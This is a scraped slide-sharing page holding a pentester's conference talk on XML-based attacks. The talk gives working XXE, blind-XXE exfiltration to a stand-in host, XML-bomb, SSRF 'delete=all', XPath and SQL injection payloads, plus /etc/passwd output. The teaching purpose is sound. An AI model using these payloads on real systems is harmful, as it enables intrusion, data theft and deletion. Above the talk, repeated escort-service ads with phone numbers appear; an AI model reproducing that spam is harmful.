Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Deliverybabeytanya
 
Russian Call girls in Dubai +971563133746 Dubai Call girls
Russian Call girls in Dubai +971563133746 Dubai Call girlsRussian Call girls in Dubai +971563133746 Dubai Call girls
Russian Call girls in Dubai +971563133746 Dubai Call girlsstephieert
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girlsstephieert
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607dollysharma2066
 
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine ServiceHot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Servicesexy call girls service in goa
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012rehmti665
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGAPNIC
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Gram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural in villages of indiaGram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural in villages of indiaimessage0108
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Sheetaleventcompany
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebJames Anderson
 
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneRussian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneCall girls in Ahmedabad High profile
 
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With RoomVIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Roomishabajaj13
 
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...aditipandeya
 

Recently uploaded (20)

Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
 
Russian Call girls in Dubai +971563133746 Dubai Call girls
Russian Call girls in Dubai +971563133746 Dubai Call girlsRussian Call girls in Dubai +971563133746 Dubai Call girls
Russian Call girls in Dubai +971563133746 Dubai Call girls
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
 
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine ServiceHot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Gram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural in villages of indiaGram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural in villages of india
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
 
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
 
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneRussian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
 
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With RoomVIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
 
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
 
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
 

[Bucharest] XML Based Attacks

  • 2. Work and education:  Pentester @ KPMG Romania  Moderator @ Romanian Security Team  Student @ Master of Information Management and Security, UPB Hint: We’re hiring! My interests:  Web/mobile application penetration tests  Internal network penetration tests  Curious about mobile and embedded devices  Bug bounty hunter About me 2
  • 3. Pentest 101 Input: Our Payload admin’+or+‘1’=‘1’--+ Process: What we are testing Login page Output: (Un)expected result Authentication bypass 3
  • 4. Roadmap 1 • XML in a few words 2 • Common vulnerabilities 3 • DTD Attacks 4 • XML Schema Attacks 5 • Xpath Injection 6 • Demo + Q & A 4
  • 5. XML Usage • Web apps - XML-RPC; - SOAP; - RSS; • Documents - PDFs; - Office suite; - eBooks; • Mobile apps • Content management 5
  • 6. XML Family • Lots of components • Complex structure • Many parsing stages • Parsing errors • Security vulnerabilities? 6
  • 7. Common vulnerabilities (1) SQL Injection Classic example: http://target.com/login.php?user=admin&pass=a’+or+’1’=‘1 Equivalent XML Payload: <?xml version="1.0" encoding="UTF-8"?> <root> <user>admin</user> <pass>a’ or ’1’=‘1</pass> </root> 7
  • 8. Common vulnerabilities (2) Cross-Site Scripting Classic example: http://example.com/search.php?query=a‛><script>alert(‚123‛)</script> Equivalent XML Payload: <?xml version="1.0" encoding="UTF-8"?> <root> <query>a‛%3E%3Cscript%3Ealert(‚123‛)%3C/script%3E</query> </root> 8
  • 9. About DTDs Notes.xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note SYSTEM "Notes.dtd"> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> Notes.dtd <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]> 9
  • 10. DTDs : XXE Attacks (1) Request containing an external entity <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [ <!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]> <updateProfile> <firstname>Joe</firstname> <lastname>&file;</lastname> </updateProfile> 10
  • 11. DTDs : XXE Attacks (2) Blind XXE Attack <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [ <!ENTITY % file SYSTEM "file:///c:/windows/win.ini"> <!ENTITY send SYSTEM 'http://example.com/?%file;'> ]> <updateProfile> <firstname>Joe</firstname> <lastname>&send;</lastname> </updateProfile> 11
  • 12. DTDs : Denial of Service (1) Billion Laughs Attack / XML Bomb <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> 12
  • 13. XML Bomb variations <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol1 "&lol2;"> <!ENTITY lol2 "&lol1;"> ]> <lolz>&lol1;</lolz> <?xml version="1.0"?> <!DOCTYPE kaboom [ <!ENTITY a "aaaaaaaaaaaaaaaaaa..."> ]> <boom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</boom> .NET Code fix for XML Bombs XmlReaderSettings settings = new XmlReaderSettings(); settings.ProhibitDtd = false; settings.MaxCharactersFromEntities = 1024; XmlReader reader = XmlReader.Create(stream, settings); 13 DTDs : Denial of Service (2)
  • 14. DTDs : SSRF Attacks (1) Server Side Request Forgery attack example: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [ <!ENTITY ssrf SYSTEM 'http://10.0.0.2/users.php?delete=all'> ]> <updateProfile> <firstname>Joe</firstname> <lastname>&ssrf;</lastname> </updateProfile> 14
  • 15. DTDs : SSRF Attacks (2) 15
  • 16. XML Schema Notes.xml <?xml version="1.0" encoding="UTF-8"?> <note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=‚Notes.xsd"> > <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> Notes.xsd <?xml version="1.0"?> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="note"> <xs:complexType> <xs:sequence> <xs:element name="to" type="xs:string"/> <xs:element name="from" type="xs:string"/> <xs:element name="heading" type="xs:string"/> <xs:element name="body" type="xs:string"/> </xs:sequence> </xs:complexType> </xs:element> </xs:schema> 16
  • 17. XML Schema SSRF Server Side Request Forgery attack example: <?xml version="1.0" encoding="utf-8"?> <roottag xmlns="http://10.0.0.1/users.php?delete=all" xmlns:secondaryns="http://10.0.0.2/users.php?delete=all" xmlns:xsi="http://10.0.0.3/users.php?delete=all" xsi:schemaLocation="http://10.0.0.4/users.php?delete=all"> <secondaryns:s> Hello! </secondaryns:s> </roottag> 17
  • 18. XML Schema Poisoning attack <?xml version="1.0" encoding="utf-8"?> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="note"> <xs:complexType> <xs:sequence> <xs:element name="to" type="xs:string"/> <xs:element name="from" type="xs:string"/> <xs:element name="heading" type="xs:string"/> <xs:element name="body" type="xs:string"/> </xs:sequence> </xs:complexType> </xs:element> </xs:schema> 18
  • 19. XML XPath Notes.xml <?xml version="1.0" encoding="UTF-8"?> <bookstore> <book category="COOKING"> <title lang="it">Everyday Italian</title> <author>Giada De Laurentiis</author> <year>2005</year> <price>30.00</price> </book> <book category="CHILDREN"> <title lang="en">Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>19.99</price> </book> </bookstore> XPath expressions /bookstore/book[1] /bookstore/book[price>25.00]/title //title[@lang='en'] /bookstore/book[last()] 19
  • 20. XPath Injection employees.xml <?xml version="1.0" encoding="utf-8"?> <Employees> <Employee ID="1"> <Name>Mike</Name> <UserName>Mike07</UserName> <Password>TopSecret</Password> <Type>Admin</Type> </Employee> </Employees> Payload Username: Mike07 Password: oops' or 'a'='a Result - FindUserXPath becomes //Employee[UserName/text()='Mike07' And Password/text()='oops' or 'a'='a'] C#: String FindUserXPath; FindUserXPath = "//Employee[UserName/text()='" + Request("Username") + "' And Password/text()='" + Request("Password") + "']"; 20
  • 21. Content-Type header (1) HTTP Request: POST /update.php HTTP/1.1 Host: target.com Accept: application/json Content-Type: application/json Content-Length: 38 {"search":"name","value":‚val"} HTTP Response: HTTP/1.1 200 OK Content-Type: application/json Content-Length: 43 {"error": "no results for name val"} HTTP Request: POST /update.php HTTP/1.1 Host: target.com Accept: application/json Content-Type: application/xml Content-Length: 112 <?xml version="1.0" encoding="UTF-8" ?> <root> <search>name</search> <value>val</value> </root> HTTP Response: HTTP/1.1 200 OK Content-Type: application/json Content-Length: 43 {"error": "no results for name val"} 21
  • 22. HTTP Request: POST /update.php HTTP/1.1 Host: target.com Accept: application/json Content-Type: application/xml Content-Length: 228 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <root> <search>name</search> <value>&xxe;</value> </root> HTTP Response: HTTP/1.1 200 OK Content-Type: application/json Content-Length: 2467 {"error": "no results for name root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync.... 22 Content-Type header (2)